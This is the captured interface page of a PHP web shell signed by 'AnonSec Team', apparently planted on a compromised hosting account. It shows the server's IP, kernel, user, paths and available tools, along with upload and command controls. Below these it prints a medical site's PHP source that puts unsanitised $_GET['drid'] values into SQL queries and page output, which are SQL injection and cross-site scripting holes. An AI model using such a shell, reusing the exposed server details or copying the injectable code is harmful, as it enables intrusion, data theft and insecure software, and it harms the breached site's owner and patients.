Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.221.142.39
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/fresurgeryshowinvestigation.php
<?php
session_start();
require_once("../LoginManager.php");
require_once("../DBManager.php");
include("dbconnection.php");
include("header.php");
include("workdeskmenu.php");
?>
 <div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">
                     		<?php 
		session_start();
$DisplayForm=True;
include("dbconnection.php");
$sql12 ="SELECT * FROM frquencytracker WHERE drid='$_GET[drid]'";
		$qsql12 = mysqli_query($con,$sql12);
		while($rh12 = mysqli_fetch_array($qsql12))
		{
	$DisplayForm=False;
echo "";
}
if($DisplayForm)
{
echo "<script>window.location='frequencyinvestigation_add.php?drid=$_GET[drid]&surgeryid=$rh12[surgeryid]'</script>;</script>";
} else{
 
?> 

        
  <script src='http://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js'></script>

    <script src="../dist/js/price.js"></script>
    <br>
    <br>
        <?php 
include("dbconnection.php");
		 $narayan=LoginManager::currentUser();
        $hari=LoginManager::getUserTypeByuname("$narayan");
        	$sql ="SELECT * FROM frquencytracker WHERE drid='$_GET[drid]'";
		$qsql = mysqli_query($con,$sql);
		while($re = mysqli_fetch_array($qsql))
		{
		    	$sql1 ="SELECT * FROM list_tretment WHERE trid='$re[surgery]'";
		$qsql1 = mysqli_query($con,$sql1);
		while($re2 = mysqli_fetch_array($qsql1))
		{
		    	$sql1 ="SELECT * FROM site_users WHERE userno='$re[drid]'";
		$qsql1 = mysqli_query($con,$sql1);
		if($re1 = mysqli_fetch_array($qsql1))
		{
     echo"
	<a style='color:blue'  target='_blank' href='frequencyinvestigation_add.php?drid=$re[drid]&surgeryid=$re[surgeryid]'><u><h4>$re2[tratment]</h4></u></a>
	
	
	";
		}
		}
		}
		
		echo"<br>	<a style='color:blue'  target='_blank' href='frqinvestigaationn.php?drid=$_GET[drid]'><u><h4 align='center'>Add New FPM</h4></u></a>
	";
		?>
	<br>
    <br>
    
    <?php
}
?>


Anon7 - 2022
AnonSec Team